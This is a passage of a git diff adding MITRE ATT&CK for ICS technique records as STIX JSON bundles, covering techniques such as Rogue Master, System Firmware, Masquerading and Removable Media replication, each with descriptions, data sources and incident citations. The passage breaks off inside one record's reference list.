@@ -0,0 +1,64 @@ +{ + "type": "bundle", + "id": "bundle--6f0490d6-64a2-4552-b9fe-cdba1777d4ff", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-05-08T20:13:24.241Z", + "name": "Program Organization Units", + "description": "Program Organizational Units (POUs) are block structures used within PLC programming to create programs and projects. (Citation: Guidance - IEC61131) POUs can be used to hold user programs written in IEC 61131-3 languages: Structured text, Instruction list, Function block, and Ladder logic. (Citation: Guidance - IEC61131) Application - 201203 They can also provide additional functionality, such as establishing connections between the PLC and other devices using TCON. (Citation: PLCBlaster - Spenneberg)\n \nStuxnet uses a simple code-prepending infection technique to infect Organization Blocks (OB). For example, the following sequence of actions is performed when OB1 is infected (Citation: Stuxnet - Symantec - 201102):\n*Increase the size of the original block.\n*Write malicious code to the beginning of the block.\n*Insert the original OB1 code after the malicious code.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "lateral-movement" + }, + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "execution" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_deprecated": true, + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows", + "Safety Instrumented System/Protection Relay", + "Field Controller/RTU/PLC/IED" + ], + "x_mitre_version": "1.0", + "type": "attack-pattern", + "id": "attack-pattern--ae62fe1a-ea1a-479b-8dc0-65d250bd8bc7", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-ics-attack", + "url": "https://attack.mitre.org/techniques/T0844", + 
"external_id": "T0844" + }, + { + "source_name": "Guidance - IEC61131", + "description": "John Karl-Heinz. (n.d.). Programming Industrial Automation Systems. Retrieved October 22, 2019.", + "url": "http://www.dee.ufrj.br/controle%20automatico/cursos/IEC61131-3%20Programming%20Industrial%20Automation%20Systems.pdf" + }, + { + "source_name": "PLCBlaster - Spenneberg", + "description": "Spenneberg, Ralf, Maik Br\u00fcggemann, and Hendrik Schwartke. (2016, March 31). Plc-blaster: A worm living solely in the plc.. Retrieved September 19, 2017.", + "url": "https://www.blackhat.com/docs/asia-16/materials/asia-16-Spenneberg-PLC-Blaster-A-Worm-Living-Solely-In-The-PLC-wp.pdf" + }, + { + "source_name": "Stuxnet - Symantec - 201102", + "description": "Nicolas Falliere, Liam O Murchu, Eric Chien. (2011, February). W32.Stuxnet Dossier (Version 1.4). Retrieved September 22, 2017.", + "url": "https://www.symantec.com/content/en/us/enterprise/media/security%20response/whitepapers/w32%20stuxnet%20dossier.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_is_subtechnique": false + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--b0628bfc-5376-4a38-9182-f324501cb4cf.json b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--b0628bfc-5376-4a38-9182-f324501cb4cf.json new file mode 100644 index 0000000000000000000000000000000000000000..ca6c6a08bd727934de528798234ff45a79e6b8e0 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--b0628bfc-5376-4a38-9182-f324501cb4cf.json 
@@ -0,0 +1,51 @@ +{ + "type": "bundle", + "id": "bundle--eaa0742b-7274-4d70-ada8-c75d470e9d2a", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-09T18:38:51.471Z", + "name": "Graphical User Interface", + "description": "Adversaries may attempt to gain access to a machine via a Graphical User Interface (GUI) to enhance execution capabilities. Access to a GUI allows a user to interact with a computer in a more visual manner than a CLI. A GUI allows users to move a cursor and click on interface objects, with a mouse and keyboard as the main input devices, as opposed to just using the keyboard.\n\nIf physical access is not an option, then access might be possible via protocols such as VNC on Linux-based and Unix-based operating systems, and RDP on Windows operating systems. An adversary can use this access to execute programs and applications on the target machine.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "execution" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Human-Machine Interface" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [ + "Module: Module Load", + "Command: Command Execution", + "Logon Session: Logon Session Creation", + "Process: Process Creation" + ], + "type": "attack-pattern", + "id": "attack-pattern--b0628bfc-5376-4a38-9182-f324501cb4cf", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0823", + "external_id": "T0823" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + } + ] +} \ No newline 
at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--b14395bd-5419-4ef4-9bd8-696936f509bb.json b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--b14395bd-5419-4ef4-9bd8-696936f509bb.json new file mode 100644 index 0000000000000000000000000000000000000000..5bd21308d19aa54febc8eb77c5ffdc4e74f63312 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--b14395bd-5419-4ef4-9bd8-696936f509bb.json 
@@ -0,0 +1,64 @@ +{ + "type": "bundle", + "id": "bundle--4bc222f7-bbc4-4fe5-b896-fc0b7048b535", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-30T20:18:41.277Z", + "name": "Rogue Master", + "description": "Adversaries may setup a rogue master to leverage control server functions to communicate with outstations. A rogue master can be used to send legitimate control messages to other control system devices, affecting processes in unintended ways. It may also be used to disrupt network communications by capturing and receiving the network traffic meant for the actual master. Impersonating a master may also allow an adversary to avoid detection. \n\nIn the case of the 2017 Dallas Siren incident, adversaries used a rogue master to send command messages to the 156 distributed sirens across the city, either through a single rogue transmitter with a strong signal, or using many distributed repeaters. (Citation: Bastille April 2017) (Citation: Zack Whittaker April 2017)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "initial-access" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_platforms": [ + "Human-Machine Interface", + "Control Server", + "Engineering Workstation" + ], + "x_mitre_version": "1.2", + "x_mitre_data_sources": [ + "Network Traffic: Network Traffic Flow", + "Network Traffic: Network Traffic Content", + "Application Log: Application Log Content", + "Operational Databases: Device Alarm", + "Asset: Asset Inventory" + ], + "type": "attack-pattern", + "id": "attack-pattern--b14395bd-5419-4ef4-9bd8-696936f509bb", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0848", + "external_id": "T0848" + }, + { + 
"source_name": "Bastille April 2017", + "description": "Bastille 2017, April 17 Dallas Siren Attack Retrieved. 2020/11/06 ", + "url": "https://www.bastille.net/blogs/2017/4/17/dallas-siren-attack" + }, + { + "source_name": "Zack Whittaker April 2017", + "description": "Zack Whittaker 2017, April 12 Dallas' emergency sirens were hacked with a rogue radio signal Retrieved. 2020/11/06 ", + "url": "https://www.zdnet.com/article/experts-think-they-know-how-dallas-emergency-sirens-were-hacked/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--b52870cc-83f3-473c-b895-72d91751030b.json b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--b52870cc-83f3-473c-b895-72d91751030b.json new file mode 100644 index 0000000000000000000000000000000000000000..6a50b791ca5099dca41628ddb7f49b19d638cfb4 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--b52870cc-83f3-473c-b895-72d91751030b.json 
@@ -0,0 +1,58 @@
+{
+ "type": "bundle",
+ "id": "bundle--00606419-ba73-4949-8e2d-72f65e213000",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "modified": "2023-03-09T18:38:51.471Z",
+ "name": "Native API",
+ "description": "Adversaries may directly interact with the native OS application programming interface (API) to access system functions. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes. (Citation: The MITRE Corporation May 2017) These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations. \n\nFunctionality provided by native APIs are often also exposed to user-mode applications via interfaces and libraries. For example, functions such as memcpy and direct operations on memory registers can be used to modify user and system memory space.",
+ "kill_chain_phases": [
+ {
+ "kill_chain_name": "mitre-ics-attack",
+ "phase_name": "execution"
+ }
+ ],
+ "x_mitre_attack_spec_version": "2.1.0",
+ "x_mitre_deprecated": false,
+ "x_mitre_detection": "",
+ "x_mitre_domains": [
+ "ics-attack"
+ ],
+ "x_mitre_is_subtechnique": false,
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "x_mitre_platforms": [
+ "Control Server",
+ "Data Historian",
+ "Field Controller/RTU/PLC/IED",
+ "Human-Machine Interface",
+ "Input/Output Server",
+ "Safety Instrumented System/Protection Relay"
+ ],
+ "x_mitre_version": "1.0",
+ "x_mitre_data_sources": [
+ "Process: OS API Execution"
+ ],
+ "type": "attack-pattern",
+ "id": "attack-pattern--b52870cc-83f3-473c-b895-72d91751030b",
+ "created": "2021-04-13T12:36:26.506Z",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "revoked": false,
+ "external_references": [
+ {
+ "source_name": "mitre-attack",
+ "url": "https://attack.mitre.org/techniques/T0834",
+ "external_id": "T0834"
+ },
+ {
+ "source_name": "The MITRE Corporation May 2017",
+ "description": "The MITRE Corporation 2017, May 31 ATT&CK T1106: Native API Retrieved. 2021/04/26 ",
+ "url": "https://attack.mitre.org/techniques/T1106/"
+ }
+ ],
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ]
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--b5b9bacb-97f2-4249-b804-47fd44de1f95.json b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--b5b9bacb-97f2-4249-b804-47fd44de1f95.json
new file mode 100644
index 0000000000000000000000000000000000000000..e6299f101ce045bba64689718c316b419360f992
--- /dev/null
+++ b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--b5b9bacb-97f2-4249-b804-47fd44de1f95.json
@@ -0,0 +1,65 @@
+{
+ "type": "bundle",
+ "id": "bundle--b9eb05e2-f6bd-44ba-b56b-cbc19b9a3cd5",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "modified": "2023-03-09T18:38:51.471Z",
+ "name": "Loss of Availability",
+ "description": "Adversaries may attempt to disrupt essential components or systems to prevent owner and operator from delivering products or services. (Citation: Corero) (Citation: Michael J. Assante and Robert M. Lee) (Citation: Tyson Macaulay) \n\nAdversaries may leverage malware to delete or encrypt critical data on HMIs, workstations, or databases.\n\nIn the 2021 Colonial Pipeline ransomware incident, pipeline operations were temporally halted on May 7th and were not fully restarted until May 12th. (Citation: Colonial Pipeline Company May 2021)",
+ "kill_chain_phases": [
+ {
+ "kill_chain_name": "mitre-ics-attack",
+ "phase_name": "impact"
+ }
+ ],
+ "x_mitre_attack_spec_version": "2.1.0",
+ "x_mitre_deprecated": false,
+ "x_mitre_detection": "",
+ "x_mitre_domains": [
+ "ics-attack"
+ ],
+ "x_mitre_is_subtechnique": false,
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "x_mitre_platforms": [
+ "None"
+ ],
+ "x_mitre_version": "1.0",
+ "type": "attack-pattern",
+ "id": "attack-pattern--b5b9bacb-97f2-4249-b804-47fd44de1f95",
+ "created": "2020-05-21T17:43:26.506Z",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "revoked": false,
+ "external_references": [
+ {
+ "source_name": "mitre-attack",
+ "url": "https://attack.mitre.org/techniques/T0826",
+ "external_id": "T0826"
+ },
+ {
+ "source_name": "Colonial Pipeline Company May 2021",
+ "description": "Colonial Pipeline Company 2021, May Media Statement Update: Colonial Pipeline System Disruption Retrieved. 2021/10/08 ",
+ "url": "https://www.colpipe.com/news/press-releases/media-statement-colonial-pipeline-system-disruption"
+ },
+ {
+ "source_name": "Corero",
+ "description": "Corero Industrial Control System (ICS) Security Retrieved. 2019/11/04 ",
+ "url": "https://www.corero.com/resources/files/whitepapers/cns_whitepaper_ics.pdf"
+ },
+ {
+ "source_name": "Michael J. Assante and Robert M. Lee",
+ "description": "Michael J. Assante and Robert M. Lee Corero Industrial Control System (ICS) Security Retrieved. 2019/11/04 The Industrial Control System Cyber Kill Chain Retrieved. 2019/11/04 ",
+ "url": "https://www.sans.org/reading-room/whitepapers/ICS/industrial-control-system-cyber-kill-chain-36297"
+ },
+ {
+ "source_name": "Tyson Macaulay",
+ "description": "Tyson Macaulay Michael J. Assante and Robert M. Lee Corero Industrial Control System (ICS) Security Retrieved. 2019/11/04 The Industrial Control System Cyber Kill Chain Retrieved. 2019/11/04 RIoT Control: Understanding and Managing Risks and the Internet of Things Retrieved. 2019/11/04 ",
+ "url": "https://books.google.com/books?id=oXIYBAAAQBAJ&pg=PA249&lpg=PA249&dq=loss+denial+manipulation+of+view&source=bl&ots=dV1uQ8IUff&sig=ACfU3U2NIwGjhg051D_Ytw6npyEk9xcf4w&hl=en&sa=X&ved=2ahUKEwj2wJ7y4tDlAhVmplkKHSTaDnQQ6AEwAHoECAgQAQ#v=onepage&q=loss%20denial%20manipulation%20of%20view&f=false"
+ }
+ ],
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ]
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--b7e13ee8-182c-4f19-92a4-a88d7d855d54.json b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--b7e13ee8-182c-4f19-92a4-a88d7d855d54.json
new file mode 100644
index 0000000000000000000000000000000000000000..d819c765380f24707fbba9f04f709165d25cf231
--- /dev/null
+++ b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--b7e13ee8-182c-4f19-92a4-a88d7d855d54.json
@@ -0,0 +1,52 @@
+{
+ "type": "bundle",
+ "id": "bundle--2b49e85d-5e42-4341-9d3f-41783b849af7",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "modified": "2023-03-09T18:38:51.471Z",
+ "name": "Theft of Operational Information",
+ "description": "Adversaries may steal operational information on a production environment as a direct mission outcome for personal gain or to inform future operations. This information may include design documents, schedules, rotational data, or similar artifacts that provide insight on operations. In the Bowman Dam incident, adversaries probed systems for operational data. (Citation: Mark Thompson March 2016) (Citation: Danny Yadron December 2015)",
+ "kill_chain_phases": [
+ {
+ "kill_chain_name": "mitre-ics-attack",
+ "phase_name": "impact"
+ }
+ ],
+ "x_mitre_attack_spec_version": "2.1.0",
+ "x_mitre_domains": [
+ "ics-attack"
+ ],
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "x_mitre_platforms": [
+ "None"
+ ],
+ "x_mitre_version": "1.0",
+ "type": "attack-pattern",
+ "id": "attack-pattern--b7e13ee8-182c-4f19-92a4-a88d7d855d54",
+ "created": "2020-05-21T17:43:26.506Z",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "external_references": [
+ {
+ "source_name": "mitre-attack",
+ "url": "https://attack.mitre.org/techniques/T0882",
+ "external_id": "T0882"
+ },
+ {
+ "source_name": "Mark Thompson March 2016",
+ "description": "Mark Thompson 2016, March 24 Iranian Cyber Attack on New York Dam Shows Future of War Retrieved. 2019/11/07 ",
+ "url": "https://time.com/4270728/iran-cyber-attack-dam-fbi/"
+ },
+ {
+ "source_name": "Danny Yadron December 2015",
+ "description": "Danny Yadron 2015, December 20 Iranian Hackers Infiltrated New York Dam in 2013 Retrieved. 2019/11/07 ",
+ "url": "https://www.wsj.com/articles/iranian-hackers-infiltrated-new-york-dam-in-2013-1450662559"
+ }
+ ],
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "x_mitre_is_subtechnique": false
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--b9160e77-ea9e-4ba9-b1c8-53a3c466b13d.json b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--b9160e77-ea9e-4ba9-b1c8-53a3c466b13d.json
new file mode 100644
index 0000000000000000000000000000000000000000..058a995be77f76e5b212c14bafa5304c871df70e
--- /dev/null
+++ b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--b9160e77-ea9e-4ba9-b1c8-53a3c466b13d.json
@@ -0,0 +1,62 @@
+{
+ "type": "bundle",
+ "id": "bundle--b4312a29-3263-4291-a245-0f7334977be8",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "modified": "2023-03-09T18:38:51.471Z",
+ "name": "System Firmware",
+ "description": "System firmware on modern assets is often designed with an update feature. Older device firmware may be factory installed and require special reprograming equipment. When available, the firmware update feature enables vendors to remotely patch bugs and perform upgrades. Device firmware updates are often delegated to the user and may be done using a software update package. It may also be possible to perform this task over the network. \n\nAn adversary may exploit the firmware update feature on accessible devices to upload malicious or out-of-date firmware. Malicious modification of device firmware may provide an adversary with root access to a device, given firmware is one of the lowest programming abstraction layers. (Citation: Basnight, Zachry, et al.)",
+ "kill_chain_phases": [
+ {
+ "kill_chain_name": "mitre-ics-attack",
+ "phase_name": "persistence"
+ },
+ {
+ "kill_chain_name": "mitre-ics-attack",
+ "phase_name": "inhibit-response-function"
+ }
+ ],
+ "x_mitre_attack_spec_version": "2.1.0",
+ "x_mitre_deprecated": false,
+ "x_mitre_detection": "",
+ "x_mitre_domains": [
+ "ics-attack"
+ ],
+ "x_mitre_is_subtechnique": false,
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "x_mitre_platforms": [
+ "Safety Instrumented System/Protection Relay",
+ "Field Controller/RTU/PLC/IED",
+ "Input/Output Server"
+ ],
+ "x_mitre_version": "1.1",
+ "x_mitre_data_sources": [
+ "Application Log: Application Log Content",
+ "Operational Databases: Device Alarm",
+ "Firmware: Firmware Modification",
+ "Network Traffic: Network Traffic Content"
+ ],
+ "type": "attack-pattern",
+ "id": "attack-pattern--b9160e77-ea9e-4ba9-b1c8-53a3c466b13d",
+ "created": "2020-05-21T17:43:26.506Z",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "revoked": false,
+ "external_references": [
+ {
+ "source_name": "mitre-attack",
+ "url": "https://attack.mitre.org/techniques/T0857",
+ "external_id": "T0857"
+ },
+ {
+ "source_name": "Basnight, Zachry, et al.",
+ "description": "Basnight, Zachry, et al. 2013 Retrieved. 2017/10/17 ",
+ "url": "http://www.sciencedirect.com/science/article/pii/S1874548213000231"
+ }
+ ],
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ]
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--ba203963-3182-41ac-af14-7e7ebc83cd61.json b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--ba203963-3182-41ac-af14-7e7ebc83cd61.json
new file mode 100644
index 0000000000000000000000000000000000000000..a4dec22c79b86970a69ba780dbe837a9f415ac9e
--- /dev/null
+++ b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--ba203963-3182-41ac-af14-7e7ebc83cd61.json
@@ -0,0 +1,56 @@
+{
+ "type": "bundle",
+ "id": "bundle--c4ab8b27-b857-43c5-9754-159394b6a29a",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "modified": "2023-03-09T18:38:51.471Z",
+ "name": "Masquerading",
+ "description": "Adversaries may use masquerading to disguise a malicious application or executable as another file, to avoid operator and engineer suspicion. Possible disguises of these masquerading files can include commonly found programs, expected vendor executables and configuration files, and other commonplace application and naming conventions. By impersonating expected and vendor-relevant files and applications, operators and engineers may not notice the presence of the underlying malicious content and possibly end up running those masquerading as legitimate functions. \n\nApplications and other files commonly found on Windows systems or in engineering workstations have been impersonated before. This can be as simple as renaming a file to effectively disguise it in the ICS environment.",
+ "kill_chain_phases": [
+ {
+ "kill_chain_name": "mitre-ics-attack",
+ "phase_name": "evasion"
+ }
+ ],
+ "x_mitre_attack_spec_version": "2.1.0",
+ "x_mitre_deprecated": false,
+ "x_mitre_detection": "",
+ "x_mitre_domains": [
+ "ics-attack"
+ ],
+ "x_mitre_is_subtechnique": false,
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "x_mitre_platforms": [
+ "Human-Machine Interface",
+ "Control Server"
+ ],
+ "x_mitre_version": "1.1",
+ "x_mitre_data_sources": [
+ "Scheduled Job: Scheduled Job Creation",
+ "Service: Service Creation",
+ "Command: Command Execution",
+ "File: File Modification",
+ "Service: Service Modification",
+ "Process: Process Metadata",
+ "File: File Metadata",
+ "Scheduled Job: Scheduled Job Modification"
+ ],
+ "type": "attack-pattern",
+ "id": "attack-pattern--ba203963-3182-41ac-af14-7e7ebc83cd61",
+ "created": "2020-05-21T17:43:26.506Z",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "revoked": false,
+ "external_references": [
+ {
+ "source_name": "mitre-attack",
+ "url": "https://attack.mitre.org/techniques/T0849",
+ "external_id": "T0849"
+ }
+ ],
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ]
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--be69c571-d746-4b1f-bdd0-c0c9817e9068.json b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--be69c571-d746-4b1f-bdd0-c0c9817e9068.json
new file mode 100644
index 0000000000000000000000000000000000000000..dc3dce7a8aea6153512bd7fe44786c6dbf1322b0
--- /dev/null
+++ b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--be69c571-d746-4b1f-bdd0-c0c9817e9068.json
@@ -0,0 +1,52 @@
+{
+ "type": "bundle",
+ "id": "bundle--99cca7a3-7894-4a3b-bf46-e95b57711886",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "modified": "2023-03-09T18:38:51.471Z",
+ "name": "Program Download",
+ "description": "Adversaries may perform a program download to transfer a user program to a controller. \n\nVariations of program download, such as online edit and program append, allow a controller to continue running during the transfer and reconfiguration process without interruption to process control. However, before starting a full program download (i.e., download all) a controller may need to go into a stop state. This can have negative consequences on the physical process, especially if the controller is not able to fulfill a time-sensitive action. Adversaries may choose to avoid a download all in favor of an online edit or program append to avoid disrupting the physical process. An adversary may need to use the technique Detect Operating Mode or Change Operating Mode to make sure the controller is in the proper mode to accept a program download.\n\nThe granularity of control to transfer a user program in whole or parts is dictated by the management protocol (e.g., S7CommPlus, TriStation) and underlying controller API. Thus, program download is a high-level term for the suite of vendor-specific API calls used to configure a controllers user program memory space. \n\n[Modify Controller Tasking](https://attack.mitre.org/techniques/T0821) and [Modify Program](https://attack.mitre.org/techniques/T0889) represent the configuration changes that are transferred to a controller via a program download.",
+ "kill_chain_phases": [
+ {
+ "kill_chain_name": "mitre-ics-attack",
+ "phase_name": "lateral-movement"
+ }
+ ],
+ "x_mitre_attack_spec_version": "3.1.0",
+ "x_mitre_deprecated": false,
+ "x_mitre_detection": "",
+ "x_mitre_domains": [
+ "ics-attack"
+ ],
+ "x_mitre_is_subtechnique": false,
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "x_mitre_platforms": [
+ "Field Controller/RTU/PLC/IED",
+ "Safety Instrumented System/Protection Relay"
+ ],
+ "x_mitre_version": "1.1",
+ "x_mitre_data_sources": [
+ "Network Traffic: Network Traffic Content",
+ "Asset: Asset Inventory",
+ "Application Log: Application Log Content",
+ "Operational Databases: Device Alarm"
+ ],
+ "type": "attack-pattern",
+ "id": "attack-pattern--be69c571-d746-4b1f-bdd0-c0c9817e9068",
+ "created": "2020-05-21T17:43:26.506Z",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "revoked": false,
+ "external_references": [
+ {
+ "source_name": "mitre-attack",
+ "url": "https://attack.mitre.org/techniques/T0843",
+ "external_id": "T0843"
+ }
+ ],
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ]
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--c267bbee-bb59-47fe-85e0-3ed210337c21.json b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--c267bbee-bb59-47fe-85e0-3ed210337c21.json
new file mode 100644
index 0000000000000000000000000000000000000000..a936064ebbb8fbc7b22d8c3f8a96072eb1e38e7a
--- /dev/null
+++ b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--c267bbee-bb59-47fe-85e0-3ed210337c21.json
@@ -0,0 +1,103 @@
+{
+ "type": "bundle",
+ "id": "bundle--1feedcd4-6b17-4200-8d79-1dd0c6d7ab90",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "modified": "2023-03-09T18:38:51.471Z",
+ "name": "Replication Through Removable Media",
+ "description": "Adversaries may move onto systems, such as those separated from the enterprise network, by copying malware to removable media which is inserted into the control systems environment. The adversary may rely on unknowing trusted third parties, such as suppliers or contractors with access privileges, to introduce the removable media. This technique enables initial access to target devices that never connect to untrusted networks, but are physically accessible. \n\nOperators of the German nuclear power plant, Gundremmingen, discovered malware on a facility computer not connected to the internet. (Citation: Kernkraftwerk Gundremmingen April 2016) (Citation: Trend Micro April 2016) The malware included Conficker and W32.Ramnit, which were also found on eighteen removable disk drives in the facility. (Citation: Christoph Steitz, Eric Auchard April 2016) (Citation: Catalin Cimpanu April 2016) (Citation: Peter Dockrill April 2016) (Citation: Lee Mathews April 2016) (Citation: Sean Gallagher April 2016) (Citation: Dark Reading Staff April 2016) The plant has since checked for infection and cleaned up more than 1,000 computers. (Citation: BBC April 2016) An ESET researcher commented that internet disconnection does not guarantee system safety from infection or payload execution. (Citation: ESET April 2016)",
+ "kill_chain_phases": [
+ {
+ "kill_chain_name": "mitre-ics-attack",
+ "phase_name": "initial-access"
+ }
+ ],
+ "x_mitre_attack_spec_version": "2.1.0",
+ "x_mitre_deprecated": false,
+ "x_mitre_detection": "",
+ "x_mitre_domains": [
+ "ics-attack"
+ ],
+ "x_mitre_is_subtechnique": false,
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "x_mitre_platforms": [
+ "Human-Machine Interface",
+ "Data Historian",
+ "Control Server"
+ ],
+ "x_mitre_version": "1.0",
+ "x_mitre_data_sources": [
+ "Process: Process Creation",
+ "File: File Creation",
+ "File: File Access",
+ "Drive: Drive Creation"
+ ],
+ "type": "attack-pattern",
+ "id": "attack-pattern--c267bbee-bb59-47fe-85e0-3ed210337c21",
+ "created": "2020-05-21T17:43:26.506Z",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "revoked": false,
+ "external_references": [
+ {
+ "source_name": "mitre-attack",
+ "url": "https://attack.mitre.org/techniques/T0847",
+ "external_id": "T0847"
+ },
+ {
+ "source_name": "BBC April 2016",
+ "description": "BBC 2016, April 28 German nuclear plant hit by computer viruses Retrieved. 2019/10/14 ",
+ "url": "https://www.bbc.com/news/technology-36158606"
+ },
+ {
+ "source_name": "Catalin Cimpanu April 2016",
+ "description": "Catalin Cimpanu 2016, April 26 Malware Shuts Down German Nuclear Power Plant on Chernobyl's 30th Anniversary Retrieved. 2019/10/14 ",
+ "url": "https://news.softpedia.com/news/on-chernobyl-s-30th-anniversary-malware-shuts-down-german-nuclear-power-plant-503429.shtml"
+ },
+ {
+ "source_name": "Christoph Steitz, Eric Auchard April 2016",
+ "description": "Christoph Steitz, Eric Auchard 2016, April 26 German nuclear plant infected with computer viruses, operator says Retrieved. 2019/10/14 ",
+ "url": "https://www.reuters.com/article/us-nuclearpower-cyber-germany/german-nuclear-plant-infected-with-computer-viruses-operator-says-idUSKCN0XN2OS"
+ },
+ {
+ "source_name": "Dark Reading Staff April 2016",
